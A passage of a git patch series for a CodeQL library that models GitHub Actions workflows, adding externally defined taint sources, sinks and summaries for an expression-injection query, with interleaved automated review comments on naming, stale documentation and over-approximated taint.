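          child = this.(ReusableWorkflowStmt).getInputsStmt() or
          child = this.(ReusableWorkflowStmt).getOutputsStmt()
        ) and
        l = child.getLocation()
      |
        child
        order by
          l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString()
      )
  }
}
```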
@@ -174,9 +183,10 @@ private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof } } -private class InputExprTree extends LeafTree instanceof InputExpr { } +private class InputExprTree extends LeafTree instanceof ReusableWorkflowInputExpr { } -private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceof OutputsStmt { +private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceof ReusableWorkflowOutputsStmt +{ override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | @@ -189,13 +199,17 @@ private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceo } } -private class OutputExprTree extends LeafTree instanceof OutputExpr { } +private class OutputExprTree extends LeafTree instanceof ReusableWorkflowOutputExpr { } private class JobTree extends StandardPreOrderTree instanceof JobStmt { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - (child = super.getAStep() or child = super.getOutputStmt() or child = super.getUsesExpr()) and + ( + child = super.getAStepStmt() or + child = super.getOutputStmt() or + child = super.getUsesExpr() + ) and l = child.getLocation() | child @@ -213,7 +227,7 @@ private class StepUsesTree extends StandardPreOrderTree instanceof StepUsesExpr override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - child = super.getArgument(_) and l = child.getLocation() + child = super.getArgumentExpr(_) and l = child.getLocation() | child order by @@ -226,7 +240,7 @@ private class JobUsesTree extends StandardPreOrderTree instanceof JobUsesExpr { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - child = super.getArgument(_) and l = child.getLocation() + child = super.getArgumentExpr(_) and l = child.getLocation() | child order by 
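Review bot: `JobTree.getChildNode` now lists `super.getUsesExpr()` as a child of the job, but `JobUsesExpr` is declared over the same YAML mapping as the job itself (`JobUsesExpr() { this instanceof JobStmt and ... }` and `JobStmt getJobStmt() { result = this }` in `Ast.qll`), so for a `uses:` job this appears to make the job its own CFG child. That both makes `JobTree` and `JobUsesTree` two `StandardPreOrderTree` instances over one AST node, with their `getChildNode` results unioned, and risks a self-loop in the generated control flow; I could not confirm from the visible code how the shared CFG library treats such a cycle, so please verify on a fixture with a reusable-workflow call. If the intent is only to visit the `with:` arguments, drop the `child = super.getUsesExpr()` disjunct here and let `JobUsesTree` (which already ranks `getArgumentExpr(_)`) supply them, with a comment such as `// A uses: job is itself a JobUsesExpr; its arguments are children via JobUsesTree.`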
diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index ead312d8af6b..84019aa27273 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -27,7 +27,7 @@ private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { override predicate step(DataFlow::Node pred, DataFlow::Node succ) { exists(UsesExpr u | u.getCallee() = "mad9000/actions-find-and-replace-string" and - pred.asExpr() = u.getArgument(["source", "replace"]) and + pred.asExpr() = u.getArgumentExpr(["source", "replace"]) and succ.asExpr() = u ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 02b7de847e3e..76495e3f80ca 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -20,14 +20,14 @@ class OutNode extends ExprNode { } /** - * Not used + * Not implemented */ class CastNode extends Node { CastNode() { none() } } /** - * Not used + * Not implemented */ class PostUpdateNode extends Node { PostUpdateNode() { none() } @@ -45,8 +45,6 @@ predicate isArgumentNode(ArgumentNode arg, DataFlowCall call, ArgumentPosition p DataFlowCallable nodeGetEnclosingCallable(Node node) { node = TExprNode(any(DataFlowExpr e | result = e.getScope())) - // node = TReturningNode(any(Cfg::Node n | result = n.getScope())) - // node = TParameterNode(any(InputExpr p | p = result.(ReusableWorkflowStmt).getInputs().getInputExpr(_))) } DataFlowType getNodeType(Node node) { any() } @@ -84,10 +82,7 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof ReusableWorkflowStmt then result = this.(ReusableWorkflowStmt).getName() - else - if this instanceof JobStmt - then result = this.(JobStmt).getId() - else none() + else none() } } 
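Review bot: After this change `DataFlowCallable.getName()` is `none()` for every workflow that is not a `ReusableWorkflowStmt`, and since `nodeGetEnclosingCallable` now maps every node to its workflow scope, that is the callable of every node in an ordinary workflow; this is fine for `viableCallable`, which only needs callee names, but the `string getName()` member now silently has no value for most callables and nothing says so. Please document it, e.g. `/** Gets the name used to resolve `uses:` calls to this callable; only reusable workflows have one (their relative file path). */`, and note on the same line that the caller's `getCallee()` must be normalised to that path form or local calls will not resolve. `DataFlowCallable` begins before this hunk.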
@@ -105,16 +100,6 @@ class NormalReturn extends ReturnKind, TNormalReturn { /** Gets a viable implementation of the target of the given `Call`. */ DataFlowCallable viableCallable(DataFlowCall c) { c.getName() = result.getName() } -// /** -// * Holds if the set of viable implementations that can be called by `call` -// * might be improved by knowing the call context. -// */ -// predicate mayBenefitFromCallContext(DataFlowCall call, DataFlowCallable c) { none() } -// /** -// * Gets a viable dispatch target of `call` in the context `ctx`. This is -// * restricted to those `call`s for which a context might make a difference. -// */ -// DataFlowCallable viableImplInCallContext(DataFlowCall call, DataFlowCall ctx) { none() } /** * Gets a node that can read the value returned from `call` with return kind * `kind`. @@ -162,17 +147,17 @@ class ContentApprox extends TContentApprox { ContentApprox getContentApprox(Content c) { none() } /** - * Made a string to match the ArgumentPosition type + * Made a string to match the ArgumentPosition type. */ class ParameterPosition extends string { - ParameterPosition() { exists(any(ReusableWorkflowStmt w).getInputs().getInputExpr(this)) } + ParameterPosition() { exists(any(ReusableWorkflowStmt w).getInputsStmt().getInputExpr(this)) } } /** * Made a string to match `With:` keys in the AST */ class ArgumentPosition extends string { - ArgumentPosition() { exists(any(UsesExpr e).getArgument(this)) } + ArgumentPosition() { exists(any(UsesExpr e).getArgumentExpr(this)) } } /** @@ -185,7 +170,7 @@ predicate stepUsesOutputDefToUse(Node nodeFrom, Node nodeTo) { uses = nodeFrom.asExpr() and outputRead = nodeTo.asExpr() and outputRead.getStepId() = uses.getId() and - uses.getJob() = outputRead.getJob() + uses.getJobStmt() = outputRead.getJobStmt() ) } 
@@ -195,7 +180,7 @@ predicate runOutputDefToUse(Node nodeFrom, Node nodeTo) { uses = nodeFrom.asExpr() and outputRead = nodeTo.asExpr() and outputRead.getStepId() = uses.getId() and - uses.getJob() = outputRead.getJob() + uses.getJobStmt() = outputRead.getJobStmt() ) } @@ -223,7 +208,12 @@ predicate reusableWorkflowInputDefToUse(Node nodeFrom, Node nodeTo) { * Local flow steps are always between two nodes in the same Cfg scope (job definition). */ pragma[nomagic] -predicate localFlowStep(Node nodeFrom, Node nodeTo) { none() } +predicate localFlowStep(Node nodeFrom, Node nodeTo) { + stepUsesOutputDefToUse(nodeFrom, nodeTo) or + runOutputDefToUse(nodeFrom, nodeTo) or + jobOutputDefToUse(nodeFrom, nodeTo) or + reusableWorkflowInputDefToUse(nodeFrom, nodeTo) +} /** * a simple local flow step that should always preserve the call context (same callable) @@ -238,12 +228,7 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr * AKA teleport steps * local steps are preferible since they are more predictable and easier to control */ -predicate jumpStep(Node nodeFrom, Node nodeTo) { - stepUsesOutputDefToUse(nodeFrom, nodeTo) or - runOutputDefToUse(nodeFrom, nodeTo) or - jobOutputDefToUse(nodeFrom, nodeTo) or - reusableWorkflowInputDefToUse(nodeFrom, nodeTo) -} +predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } /** * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus, diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 80f504963b9b..a14b06938746 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -27,7 +27,7 @@ class Node extends TNode { } /** - * Any Ast Expression + * Any Ast Expression. * UsesExpr, RunExpr, ArgumentExpr, VarAccessExpr, ... */ class ExprNode extends Node, TExprNode { 
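Review bot: The QLDoc left above `localFlowStep` still says local steps are "between two nodes in the same Cfg scope (job definition)", but this same commit changed `CfgScope` to `WorkflowScope`, and that is precisely what makes it valid to move `jobOutputDefToUse` and `reusableWorkflowInputDefToUse` (which cross job boundaries inside one file) from `jumpStep` into `localFlowStep`. A reader who trusts the comment will conclude the job-output step is misplaced. Update it to `* Local flow steps are always between two nodes in the same Cfg scope, which is now the whole workflow file, so job-output and reusable-workflow-input reads within one workflow are local.`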
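Review bot: `jumpStep` is now `none()`, but its header comment still describes it as the home of the def-to-use "teleport steps" and argues that local steps are "preferible" (typo for "preferable"). Since the steps it talks about were just moved out, rewrite it to say what the predicate is now: `* Steps that ignore call context (none yet); cross-scope flow is expressed as call/return flow rather than jumps.`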
@@ -48,34 +48,34 @@ class ExprNode extends Node, TExprNode { * Reusable workflow input nodes */ class ParameterNode extends ExprNode { - private InputExpr parameter; + private ReusableWorkflowInputExpr parameter; ParameterNode() { this.asExpr() = parameter and - parameter = any(ReusableWorkflowStmt w).getInputs().getInputExpr(_) + parameter = any(ReusableWorkflowStmt w).getInputsStmt().getInputExpr(_) } predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { - parameter = c.(ReusableWorkflowStmt).getInputs().getInputExpr(pos) + parameter = c.(ReusableWorkflowStmt).getInputsStmt().getInputExpr(pos) } override string toString() { result = parameter.toString() } override Location getLocation() { result = parameter.getLocation() } - InputExpr getInputExpr() { result = parameter } + ReusableWorkflowInputExpr getInputExpr() { result = parameter } } /** - * An argument to a Uses step (call) + * An argument to a Uses step (call). */ class ArgumentNode extends ExprNode { - ArgumentNode() { this.getCfgNode().getAstNode() = any(UsesExpr e).getArgument(_) } + ArgumentNode() { this.getCfgNode().getAstNode() = any(UsesExpr e).getArgumentExpr(_) } predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { this.getCfgNode() = call.(Cfg::Node).getASuccessor+() and call.(Cfg::Node).getAstNode() = - any(UsesExpr e | e.getArgument(pos) = this.getCfgNode().getAstNode()) + any(UsesExpr e | e.getArgumentExpr(pos) = this.getCfgNode().getAstNode()) } } @@ -87,7 +87,7 @@ class ReturnNode extends ExprNode { ReturnNode() { this.getCfgNode() = node and - node.getAstNode() = any(ReusableWorkflowStmt w).getOutputs().getOutputExpr(_) + node.getAstNode() = any(ReusableWorkflowStmt w).getOutputsStmt().getOutputExpr(_) } ReturnKind getKind() { result = TNormalReturn() } diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 2fe6f17dfb61..f8d6e0c804b6 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql 
+++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -24,8 +24,6 @@ private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } - //predicate isSink(DataFlow::Node sink) { any() } - //predicate neverSkip(DataFlow::Node node) { any() } } module MyFlow = TaintTracking::Global; From 2eaca7e826c8f990d999696990e1e6a2d43c9992 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Feb 2024 22:49:54 +0100 Subject: [PATCH 018/707] Add support for external definitions --- .../codeql/actions/dataflow/ExternalFlow.qll | 31 ++++++++++++++++++ .../codeql/actions/dataflow/FlowSources.qll | 23 +++++++++---- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 32 ++++++++++++------- .../internal/ExternalFlowExtensions.qll | 20 ++++++++++++ ql/lib/ext/sinks.model.yml | 11 +++++++ ql/lib/ext/sources.model.yml | 11 +++++++ ql/lib/ext/summaries.model.yml | 19 +++++++++++ ql/lib/qlpack.yml | 8 +++-- ql/lib/test/test.ql | 13 ++++++-- .../Security/CWE-094/ExpressionInjection.ql | 6 +++- 10 files changed, 150 insertions(+), 24 deletions(-) create mode 100644 ql/lib/codeql/actions/dataflow/ExternalFlow.qll create mode 100644 ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll create mode 100644 ql/lib/ext/sinks.model.yml create mode 100644 ql/lib/ext/sources.model.yml create mode 100644 ql/lib/ext/summaries.model.yml diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll new file mode 100644 index 000000000000..6e02e4036ba3 --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll 
@@ -0,0 +1,31 @@
+private import internal.ExternalFlowExtensions as Extensions
+import codeql.actions.DataFlow
+import actions
+
+/** Holds if a source model exists for the given parameters. */
+predicate sourceModel(string action, string version, string output, string kind) {
+ Extensions::sourceModel(action, version, output, kind)
+}
+
+/** Holds if a sink model exists for the given parameters. */
+predicate summaryModel(string action, string version, string input, string output, string kind) {
+ Extensions::summaryModel(action, version, input, output, kind)
+}
+
+/** Holds if a sink model exists for the given parameters. */
+predicate sinkModel(string action, string version, string input, string kind) {
+ Extensions::sinkModel(action, version, input, kind)
+}
+
+predicate sinkNode(DataFlow::ExprNode sink, string kind) {
+ exists(UsesExpr uses, string action, string version, string input |
+ uses.getArgumentExpr(input.splitAt(",").trim()) = sink.asExpr() and
+ sinkModel(action, version, input, kind) and
+ uses.getCallee() = action and
+ (
+ if version.trim() = "*"
+ then uses.getVersion() = any(string v)
+ else uses.getVersion() = version.splitAt(",").trim()
+ )
+ )
+}
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll
index 3e6a6141767c..3bde829321fe 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll
@@ -1,5 +1,6 @@
 import actions
 import codeql.actions.DataFlow
+import codeql.actions.dataflow.ExternalFlow
 
 /**
 * A data flow source.
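Review bot: The QLDoc on `summaryModel` reads `/** Holds if a sink model exists for the given parameters. */`, a copy of the `sinkModel` comment; it should read `/** Holds if a summary model exists for the given parameters. */`. Separately, the version test in `sinkNode` (`if version.trim() = "*" then uses.getVersion() = any(string v) else ...`) is repeated verbatim in `FlowSources.qll` and `FlowSteps.qll` in this same commit, and `uses.getVersion() = any(string v)` is just `exists(uses.getVersion())`, which also means `*` never matches a `uses:` with no version at all. Centralising it in one helper keeps the three call sites in step and makes the "any version" semantics explicit; whether a versionless `uses:` should match `*` is a decision to document, so I kept the current behaviour and commented it.
```ql
/**
 * Holds if `uses` matches the `version` column of a model row: either `*`
 * or one of a comma-separated list of tags/SHAs. A `uses:` with no version
 * does not match `*` (current behaviour, kept deliberately).
 */
bindingset[version]
predicate versionMatches(UsesExpr uses, string version) {
  version.trim() = "*" and exists(uses.getVersion())
  or
  uses.getVersion() = version.splitAt(",").trim()
}
```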
@@ -124,14 +125,22 @@ private class EventSource extends RemoteFlowSource { override string getSourceType() { result = "User-controlled events" } } -private class ChangedFilesSource extends RemoteFlowSource { - ChangedFilesSource() { - exists(UsesExpr uses | - uses.getCallee() = "tj-actions/changed-files" and - uses.getVersion() = ["v10", "v20", "v30", "v40"] and - uses = this.asExpr() +private class ExternallyDefinedSource extends RemoteFlowSource { + string soutceType; + + ExternallyDefinedSource() { + exists(UsesExpr uses, string action, string version, /*string output,*/ string kind | + sourceModel(action, version, _, kind) and + uses.getCallee() = action and + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.splitAt(",").trim() + ) and + uses = this.asExpr() and + soutceType = kind ) } - override string getSourceType() { result = "User-controlled list of changed files" } + override string getSourceType() { result = soutceType } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 84019aa27273..e5fa04427ccf 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -5,6 +5,7 @@ import actions private import codeql.util.Unit private import codeql.actions.DataFlow +import codeql.actions.dataflow.ExternalFlow /** * A unit class for adding additional taint steps. 
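Review bot: `ExternallyDefinedSource` calls `sourceModel(action, version, _, kind)`, discarding the `output` column the model provides, and then makes the whole `uses` node the source, so every output of a modelled action is treated as attacker-controlled rather than only the one named in the row (for `tj-actions/changed-files` that includes count and boolean outputs). That is an over-approximation the comment should state, e.g. `// TODO: the model's output column is ignored; all outputs of the step are currently treated as tainted.`, or the source should be restricted to reads of that output once step-output access is modelled. Also the field is misspelled: `string soutceType;` should be `string sourceType;` (three occurrences), and `getSourceType()` now returns the raw kind (`"PR"`) where it previously returned a human-readable description, which changes alert text.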
@@ -20,16 +21,23 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } -/** - * Holds if actions-find-and-replace-string step is used. - */ -private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { +predicate externallyDefinedSummary(DataFlow::Node pred, DataFlow::Node succ) { + exists(UsesExpr uses, string action, string version, string input | + /*, string output */ summaryModel(action, version, input, _, "taint") and + uses.getCallee() = action and + ( + if version.trim() = "*" + then uses.getVersion() = any(string v) + else uses.getVersion() = version.splitAt(",").trim() + ) and + pred.asExpr() = uses.getArgumentExpr(input.splitAt(",").trim()) and + succ.asExpr() = uses + ) +} + +private class ExternallyDefinedSummary extends AdditionalTaintStep { override predicate step(DataFlow::Node pred, DataFlow::Node succ) { - exists(UsesExpr u | - u.getCallee() = "mad9000/actions-find-and-replace-string" and - pred.asExpr() = u.getArgumentExpr(["source", "replace"]) and - succ.asExpr() = u - ) + externallyDefinedSummary(pred, succ) } } @@ -46,10 +54,12 @@ private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { * echo "::set-output name=initial_url::$INITIAL_URL" */ private class RunEnvToScriptStep extends AdditionalTaintStep { - override predicate step(DataFlow::Node pred, DataFlow::Node succ) { test(pred, succ) } + override predicate step(DataFlow::Node pred, DataFlow::Node succ) { + runEnvToScriptstep(pred, succ) + } } -predicate test(DataFlow::Node pred, DataFlow::Node succ) { +predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ) { exists(RunExpr r, string varName | r.getEnvExpr(varName) = pred.asExpr() and exists(string script, string line | diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll new file mode 100644 index 000000000000..89cf4de02616 
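Review bot: `externallyDefinedSummary` likewise ignores the summary row's `output` column (`summaryModel(action, version, input, _, "taint")`) and taints the entire `uses` node, so a summary declared for one output taints all of them; document that or wire the output through once outputs are modelled, with a comment such as `// The output column is not yet used: taint reaches the whole step, not a specific output.`. The predicate is also exported (no `private`) while its only use is the `ExternallyDefinedSummary` class; mark it `private` unless it is meant as API. The `"taint"` kind is a bare literal here and in the model files; a short comment naming the accepted kinds would stop the two from drifting.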
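Review bot: The renamed helper is `runEnvToScriptstep`, which breaks the camel-case used by every other predicate in this file (`stepUsesOutputDefToUse`, `externallyDefinedSummary`); rename it `runEnvToScriptStep` at both the definition and the call in `RunEnvToScriptStep.step`. The predicate body continues past the end of this hunk, so I could not check the script-scanning logic itself.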
--- /dev/null
+++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll
@@ -0,0 +1,20 @@
+/**
+ * This module provides extensible predicates for defining MaD models.
+ */
+
+/**
+ * Holds if a source model exists for the given parameters.
+ */
+extensible predicate sourceModel(string action, string version, string output, string kind);
+
+/**
+ * Holds if a summary model exists for the given parameters.
+ */
+extensible predicate summaryModel(
+ string action, string version, string input, string output, string kind
+);
+
+/**
+ * Holds if a sink model exists for the given parameters.
+ */
+extensible predicate sinkModel(string action, string version, string input, string kind);
diff --git a/ql/lib/ext/sinks.model.yml b/ql/lib/ext/sinks.model.yml
new file mode 100644
index 000000000000..e28ec39d1bee
--- /dev/null
+++ b/ql/lib/ext/sinks.model.yml
@@ -0,0 +1,11 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: sinkModel
+ data:
+ - [
+ "FAKE-mad9000/actions-find-and-replace-string",
+ "*",
+ "source",
+ "expression-injection",
+ ]
diff --git a/ql/lib/ext/sources.model.yml b/ql/lib/ext/sources.model.yml
new file mode 100644
index 000000000000..666a5532865e
--- /dev/null
+++ b/ql/lib/ext/sources.model.yml
@@ -0,0 +1,11 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: sourceModel
+ data:
+ - [
+ "tj-actions/changed-files",
+ "v10, v20, v30, v40",
+ "all_changed_file",
+ "PR",
+ ]
diff --git a/ql/lib/ext/summaries.model.yml b/ql/lib/ext/summaries.model.yml
new file mode 100644
index 000000000000..cc8e2df5fe9e
--- /dev/null
+++ b/ql/lib/ext/summaries.model.yml
@@ -0,0 +1,19 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: summaryModel
+ data:
+ - [
+ "mad9000/actions-find-and-replace-string",
+ "*",
+ "source, replace",
+ "value",
+ "taint",
+ ]
+ - [
+ "frabert/replace-string-action",
+ "*",
+ "string, replace-with",
+ "replaced",
+ "taint",
+ ]
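Review bot: `sinks.model.yml` ships a placeholder row, `"FAKE-mad9000/actions-find-and-replace-string"`, through `dataExtensions: ext/*.model.yml` in the pack, so it is loaded by every consumer of `codeql/actions-all`; it is harmless only because no real action has that name, and it will confuse anyone reading the shipped models or diffing them for a security audit. Keep placeholder rows in a test-only extension pack, or replace this one with a real sink and a comment above the row saying what the `expression-injection` kind means for an action input.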
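Review bot: The source row for `tj-actions/changed-files` names the output `"all_changed_file"`, which looks like a truncated `all_changed_files`; the column is currently ignored by `ExternallyDefinedSource`, so nothing breaks today, but as soon as the output is matched this row will silently stop producing sources. Please verify the output name against the action's `action.yml` and fix it now, and add a one-line comment on the row explaining that `"PR"` is the source kind (a pull-request-controlled value) rather than an event name.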
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 325c63f4625d..8cf5ba69354f 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -5,11 +5,13 @@ name: codeql/actions-all version: 0.0.1-dev dependencies: codeql/controlflow: ^0.1.7 - codeql/yaml: '*' - codeql/util: '*' + codeql/yaml: "*" + codeql/util: "*" codeql/dataflow: ^0.1.7 dbscheme: yaml.dbscheme extractor: yaml tests: test groups: - - yaml + - yaml +dataExtensions: + - ext/*.model.yml diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index 8d558cbaacdb..fe76852fa537 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql @@ -3,6 +3,7 @@ import codeql.actions.Ast import codeql.actions.Cfg as Cfg import codeql.actions.DataFlow import codeql.Locations +import codeql.actions.dataflow.ExternalFlow query predicate files(File f) { any() } @@ -19,7 +20,7 @@ query predicate stepUsesNodes(StepUsesExpr s) { any() } query predicate jobUsesNodes(JobUsesExpr s) { any() } query predicate usesSteps(UsesExpr call, string argname, Expression arg) { - call.getArgument(argname) = arg + call.getArgumentExpr(argname) = arg } query predicate runSteps1(RunExpr run, string body) { run.getScript() = body } @@ -48,7 +49,7 @@ query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode query predicate cfgNodes(Cfg::Node n) { //any() - n.getAstNode() instanceof OutputsStmt + n.getAstNode() instanceof ReusableWorkflowOutputsStmt } query predicate dfNodes(DataFlow::Node e) { @@ -68,3 +69,11 @@ query predicate varIds(StepOutputAccessExpr s, string a) { s.getStepId() = a } query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l } query predicate scopes(Cfg::CfgScope c) { any() } + +query predicate sources(string action, string version, string output, string kind) { + sourceModel(action, version, output, kind) +} + +query predicate summaries(string action, string version, string input, string output, string kind) { + summaryModel(action, version, input, output, kind) +} 
diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index f8d6e0c804b6..7953c3b037c7 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -15,9 +15,13 @@ import actions import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { - ExpressionInjectionSink() { exists(RunExpr e | e.getScriptExpr() = this.asExpr()) } + ExpressionInjectionSink() { + exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + sinkNode(this, "expression-injection") + } } private module MyConfig implements DataFlow::ConfigSig { From 4f0b66ea0381f849682efecfb66dcea47652ba18 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 12 Feb 2024 13:47:44 +0100 Subject: [PATCH 019/707] Refactor MaD semantics --- ql/lib/codeql/actions/Ast.qll | 51 ++++++++++++++++--- .../codeql/actions/dataflow/ExternalFlow.qll | 20 ++++++-- .../codeql/actions/dataflow/FlowSources.qll | 25 +++++++-- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 22 ++++++-- .../internal/ExternalFlowExtensions.qll | 4 +- ql/lib/ext/REMOVEME.model.yml | 6 +++ .../frabert-replace-string-action.model.yml | 7 +++ ...-actions-find-and-replace-string.model.yml | 9 ++++ ql/lib/ext/sinks.model.yml | 11 ---- ql/lib/ext/sources.model.yml | 11 ---- ql/lib/ext/summaries.model.yml | 19 ------- ql/lib/ext/tj-actions-changed-files.model.yml | 28 ++++++++++ 12 files changed, 153 insertions(+), 60 deletions(-) create mode 100644 ql/lib/ext/REMOVEME.model.yml create mode 100644 ql/lib/ext/frabert-replace-string-action.model.yml create mode 100644 ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml delete mode 100644 ql/lib/ext/sinks.model.yml delete mode 100644 ql/lib/ext/sources.model.yml delete mode 100644 ql/lib/ext/summaries.model.yml create mode 100644 ql/lib/ext/tj-actions-changed-files.model.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index a25ef856233b..697f28b54a2f 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -115,6 +115,9 @@ class JobStmt extends Statement instanceof Actions::Job { */ string getId() { result = super.getId() } + /** Gets the workflow that this job is a part of. */ + WorkflowStmt getWorkflowStmt() { result = super.getWorkflow() } + /** Gets the step at the given index within this job. */ StepStmt getStepStmt(int index) { result = super.getStep(index) } 
@@ -181,6 +184,26 @@ class StepStmt extends Statement instanceof Actions::Step { string getId() { result = super.getId() } JobStmt getJobStmt() { result = super.getJob() } + + /** + * Gets a environment variable expression by name in the scope of the current step. + */ + Expression getEnvExpr(string name) { + exists(Actions::StepEnv env | + env.getStep() = this and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::JobEnv env | + env.getJob() = this.getJobStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::WorkflowEnv env | + env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + } } /** @@ -192,6 +215,8 @@ abstract class UsesExpr extends Expression { abstract string getVersion(); abstract Expression getArgumentExpr(string key); + + abstract Expression getEnvExpr(string name); } /** @@ -212,6 +237,8 @@ class StepUsesExpr extends StepStmt, UsesExpr { result = with.lookup(key) ) } + + override Expression getEnvExpr(string name) { result = this.(StepStmt).getEnvExpr(name) } } /** @@ -260,6 +287,23 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { override Expression getArgumentExpr(string key) { this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result } + + /** + * Gets a environment variable expression by name in the scope of the current node. + */ + override Expression getEnvExpr(string name) { + this.(YamlMapping).lookup("env").(YamlMapping).lookup(name) = result + or + exists(Actions::JobEnv env | + env.getJob() = this.getJobStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + or + exists(Actions::WorkflowEnv env | + env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + } } /** 
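Review bot: `StepStmt.getEnvExpr(name)` returns every definition of `name` at step, job and workflow level, not the effective one: a step-level `env: FOO: constant` does not hide a tainted workflow-level `FOO`, so the predicate can report flow through a variable the runtime never sees. That may be an acceptable over-approximation for a taint source, but it is not what "Gets a environment variable expression by name in the scope of the current step" says; either restrict to the innermost definition or document the choice, e.g. `* Gets every `env` definition of `name` visible from this step (step, job and workflow level); shadowing is not resolved, so an outer tainted definition is still reported.` Also "a environment" should be "an environment".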
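Review bot: `JobUsesExpr.getEnvExpr` reads its own `env` with `lookup("env").(YamlMapping).lookup(name)` while the job- and workflow-level branches (and `StepStmt.getEnvExpr`) use `maps(any(YamlScalar s | s.getValue() = name), result)`; the two forms may not agree on how keys are matched, so use one consistently. The first branch also looks unreachable in practice: a job that `uses:` a reusable workflow cannot carry its own `env` block in GitHub Actions syntax (to my recollection — please confirm against the workflow schema), and in any case workflow/job `env` is not propagated to the called workflow, so taint found here never reaches the callee's inputs. If the branch is kept, say why in a comment: `// Job-level env on a uses: job; note it is not passed to the called workflow.`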
